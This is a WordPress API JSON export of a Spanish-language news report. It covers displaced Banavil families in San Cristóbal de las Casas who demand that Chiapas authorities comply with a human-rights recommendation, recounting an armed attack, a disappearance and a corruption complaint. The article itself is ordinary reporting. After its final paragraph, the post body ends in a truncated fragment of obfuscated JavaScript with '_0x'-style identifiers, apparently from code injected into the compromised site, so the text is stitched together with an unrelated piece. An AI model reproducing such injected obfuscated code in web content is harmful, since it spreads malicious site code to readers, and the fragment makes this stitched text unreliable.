{"id":18054,"date":"2024-09-26T02:20:08","date_gmt":"2024-09-26T02:20:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18054"},"modified":"2024-09-26T02:20:09","modified_gmt":"2024-09-26T02:20:09","slug":"demandan-desplazados-cumplimiento-de-recomendaciones-de-derechos-humanos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18054","title":{"rendered":"Demandan desplazados cumplimiento de Recomendaciones de Derechos Humanos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.19.10-PM-1024x1024.jpeg\" alt=\"\" class=\"wp-image-18055\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.19.10-PM-1024x1024.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.19.10-PM-300x300.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.19.10-PM-150x150.jpeg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.19.10-PM-768x768.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-25-at-3.19.10-PM.jpeg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>25 de septiembre del 2024. San Crist\u00f3bal de las Casas.- En conferencia de prensa llevada a cabo en la Plaza de la Paz, un grupo de 20 desplazados de la comunidad Banavil, liderados por Miguel L\u00f3pez Gir\u00f3n, exigieron al gobierno el cumplimiento de la recomendaci\u00f3n emitida por la Comisi\u00f3n Estatal de Derechos Humanos (DEDH\/0933\/2012). Esta recomendaci\u00f3n, que se dirige a las autoridades del estado de Chiapas, el Ayuntamiento de Tenejapa y la Fiscal\u00eda Especializada en Justicia Ind\u00edgena, ha sido ignorada desde su aceptaci\u00f3n, dejando a los afectados sin respuestas concretas.<\/p>\n\n\n\n<p>Los desplazados, quienes han vivido en San Crist\u00f3bal de las Casas desde 2011 debido a un conflicto intercomunitario, denunciaron que su situaci\u00f3n se origin\u00f3 por su vinculaci\u00f3n con las bases de apoyo zapatistas.<\/p>\n\n\n\n<p>Acusados de no contribuir al pago de energ\u00eda el\u00e9ctrica e impuestos prediales, sufrieron un ataque armado que result\u00f3 en el desplazamiento forzado de varias familias. Entre las v\u00edctimas de este conflicto se encuentra Alonso L\u00f3pez Luna, quien fue desaparecido; su familia solo pudo recuperar un brazo, el cual fue identificado mediante su huella dactilar en la SEMEFO de la Fiscal\u00eda Ind\u00edgena. Hasta el momento, no hay detenidos por estos hechos.<\/p>\n\n\n\n<p>Los desplazados manifestaron su preocupaci\u00f3n por la falta de seguridad que les impide regresar a su comunidad y lamentaron que, tras 11 a\u00f1os, el gobierno no ha brindado garant\u00edas para su retorno. En su declaraci\u00f3n, L\u00f3pez Gir\u00f3n destac\u00f3 que el mandatario estatal est\u00e1 pr\u00f3ximo a viajar a Estados Unidos, mientras su administraci\u00f3n no ha tomado medidas efectivas para atender las recomendaciones de derechos humanos.<\/p>\n\n\n\n<p>Adem\u00e1s, el pasado 20 de septiembre, el grupo solicit\u00f3 a la Fiscal\u00eda de Combate a la Corrupci\u00f3n la apertura de una carpeta de investigaci\u00f3n por posibles actos de corrupci\u00f3n, encubrimiento y omisi\u00f3n de los funcionarios involucrados en el Consejo Estatal de Atenci\u00f3n Integral al Desplazamiento Interno, presidido por Victoria Cecilia P\u00e9rez Flores.<\/p>\n\n\n\n<p>Por \u00faltimo, los desplazados insisten en que es urgente que se atiendan sus demandas para asegurar justicia y reparaci\u00f3n integral por los da\u00f1os sufridos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 25 de septiembre del 2024. San Crist\u00f3bal de las Casas.- En conferencia de prensa llevada a cabo en la Plaza de la Paz, un grupo de 20 desplazados de la comunidad Banavil, liderados por Miguel L\u00f3pez Gir\u00f3n, exigieron al gobierno el cumplimiento de la recomendaci\u00f3n emitida por la Comisi\u00f3n Estatal de Derechos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18055,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18054","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18054","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18054"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18054\/revisions"}],"predecessor-version":[{"id":18056,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18054\/revisions\/18056"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18055"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18054"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18054"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18054"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}